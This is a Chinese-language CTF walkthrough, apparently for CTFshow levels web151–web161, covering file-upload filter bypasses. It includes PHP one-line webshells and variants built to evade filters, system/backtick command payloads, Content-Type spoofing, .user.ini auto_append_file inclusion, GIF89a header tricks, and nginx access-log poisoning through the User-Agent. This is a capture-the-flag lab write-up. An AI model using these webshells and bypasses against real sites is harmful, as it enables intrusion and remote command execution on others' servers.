web151

打算用bp改文件形式(可能没操作好)我重新试了一下抓不到
文件上传不成功
改网页前端
鼠标右键（检查），把png改为php访问，执行命令
我上传的马是<?php eval($_POST[a]);?>

查看

web152

上传马
把Content-Type改为 image/png就可以了

然后查看

web153

直接上传马发现nothing here
查一下，原来要使用
利用上传user.ini进行文件上传绕过

filename 改为.user.ini
然后把上传的文件改为

auto_append_file=xxx

xxx就是我们上传的文件
这里是auto_append_file=/var/www/html/upload/m.png
然后访问看看传上去没有

然后查看flag就行

web154

对php进行了过滤，写一个新马

 <?= eval($_POST[a]);?>
 电脑自动杀的在bp里面改

web155

php被过滤在bp中改马发包
一种新的方式

auto_append_file="xxx"

xxx是你传的文件名
这里就是

auto_append_file="m.png"

上传成功

查看flag

web156

在上题基础上过滤了[]用{}换掉
改马为<?= eval($_POST{a});?>
然后一样的操作上传成功（不会的私信）
查看flag

web157

把很多符号过滤了直接摊牌我要看flag

就是把a换成具体的命令
<?=system('tac ../f*')?>

web158

他后面肯定还会过滤东西我们直接搞个升级版
反引号会自动解析句子

<?=`tac ../f*`?>

一样的操作.user.ini
然后访问upload

web159

与上道题一样

web160

这道题反引号也过滤了
那么我们就得用日志文件包含

过滤了log所以用双引号绕过
<?=include"/var/lo"."g/nginx/access.lo"."g"?>

.user.ini

打开日志文件了
改user-agent

web 161

上传没有回显加了图片头才行

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>

GIF89a
auto_append_file="m.png"

user-agent:传马

<?php eval($_POST[a]);?>

我本来是想用POST的方法获得flag的但是不知道为什么突然用不了了
然后用的antsword
重新开了靶机发现也可以哈哈哈